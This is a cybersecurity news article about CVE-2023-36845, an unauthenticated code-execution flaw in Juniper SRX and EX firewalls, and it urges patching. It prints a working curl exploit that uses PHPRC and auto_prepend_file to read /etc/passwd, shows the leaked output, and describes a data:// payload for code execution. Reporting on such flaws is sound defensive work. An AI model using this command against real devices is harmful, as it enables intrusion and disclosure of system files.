Wednesday, June 19, 2024

Over 80% of Juniper Firewalls Vulnerable to Unauthenticated Code Execution

At the end of August 2023, Juniper Networks released a security advisory mentioning the CVE-2023-36845 vulnerability affecting SRX and EX series firewalls. The vulnerability was categorized as a Medium (5.3) severity vulnerability. 

Following this, security researchers at watchtowr published a method that could exploit this vulnerability along with the proof of concept. This particular report included the exploitation of the do_fileUpload function inside the webauth_operation.php file in the J-Web interface of the SRX firewalls. 

After this method, several threat actors started to target the webauth_operation.php file to exploit vulnerable Juniper Firewalls.

Security researchers have discovered a new method that could perform an unauthenticated remote code execution without uploading any files (watchTowr method).

Document
Get a Demo

Start protecting your SaaS data in just a few minutes!

With DoControl, you can keep your SaaS applications and data safe and secure by creating workflows tailored to your needs. It’s an easy and efficient way to identify and manage risks. You can mitigate the risk and exposure of your organization’s SaaS applications in just a few simple steps.

File Upload Not available = PHPRC + cURL

As part of the analysis, researchers purchased an SRX210 firewall and tried to exploit it using the watchTowr file upload method. Unfortunately, it was not possible as the do_fileUpload was unavailable on the specified firewall.

On investigating further, researchers discovered that Juniper firewalls use an Appweb server which invokes a CGI script. This CGI script uses multiple environment variables and arguments for accessing the user’s HTTP request. Additionally, these firewalls run on FreeBSD that can access stdin by opening /dev/fd/0.

Initially, a curl request was sent with the auto_prepend_file=”/etc/passwd” which resulted in successfully leaking the information of the /etc/passwd file.

However, in order to achieve remote code execution, researchers enabled the allow_url_include feature and sent a curl request to the firewall.

This time, the request included allow_url_include,  auto_prepend_file and data:// (embedded with  <? phpinfo(); ?>) which resulted in an unauthenticated code execution. 

$ curl “http://10.12.72.1/” -F $’auto_prepend_file=”/etc/passwd\n”‘ -F ‘PHPRC=/dev/fd/0’
root:*:0:0:Charlie &:/root:/bin/csh
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin
ext:*:39:39:External applications:/:/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>
<html>
<head>
  <meta http-equiv=”Content-Type” content=”text/html”/>
  <link rel=”stylesheet” href=”/stylesheet/juniper.css” type=”text/css”/>
  <title>Log In – Juniper Web Device Manager</title>
  <link rel=”shortcut icon” href=’images/favicon.ico’ type=”image/x-icon”/>
</head>
Unauthenticated RCE Output (Source: VulnCheck)

Furthermore, a complete report has been published by Vulncheck, which also included shocking information that nearly 15,000 internet-facing Juniper firewalls were yet to be patched. 

Nevertheless, researchers also published a GitHub repository that contains a scanner that generates an error on affected systems by setting the LD_PRELOAD environment variable.

Organizations using Juniper Firewalls are recommended to upgrade to the latest version as per the security advisory released by Juniper Networks in order to prevent threat actors from leveraging these methods for exploitation.

Keep informed about the latest Cyber Security News by following us on Google NewsLinkedinTwitter, and Facebook.

Website

Latest articles

Amtrak Data Breach: Hackers Accessed User’s Email Address

Amtrak notified its customers regarding a significant security breach involving its Amtrak Guest Rewards...

Chrome Security Update – Patch for 6 Vulnerabilities

Google has announced a new update for the Chrome browser, rolling out version 126.0.6478.114/115...

Hackers Weaponize Windows Installer (MSI) Files to Deliver Malware

Cybersecurity researchers have uncovered a sophisticated malware campaign orchestrated by a threat actor group,...

Hackers Using VPNs To Exploit Restrictions & Steal Mobile Data

Hackers are offering "free" mobile data access on Telegram channels by exploiting loopholes in...

New PhaaS Platform Lets Attackers Bypass Two-Factor Authentication

Several phishing campaign kits have been used widely by threat actors in the past....

Stuxnet, The Malware That Propagates To Air-Gapped Networks

Stuxnet, a complex worm discovered in 2010, targeted Supervisory Control and Data Acquisition (SCADA)...

Threat Actors Claiming Breach of AMD Source Code on Hacking Forums

A threat actor named " IntelBroker " claims to have breached AMD in June...
Eswar
Eswar
Eswar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Free Webinar

API Vulnerability Scanning

71% of the internet traffic comes from APIs so APIs have become soft targets for hackers.Securing APIs is a simple workflow provided you find API specific vulnerabilities and protect them.In the upcoming webinar, join Vivek Gopalan, VP of Products at Indusface as he takes you through the fundamentals of API vulnerability scanning..
Key takeaways include:

  • Scan API endpoints for OWASP API Top 10 vulnerabilities
  • Perform API penetration testing for business logic vulnerabilities
  • Prioritize the most critical vulnerabilities with AcuRisQ
  • Workflow automation for this entire process

Related Articles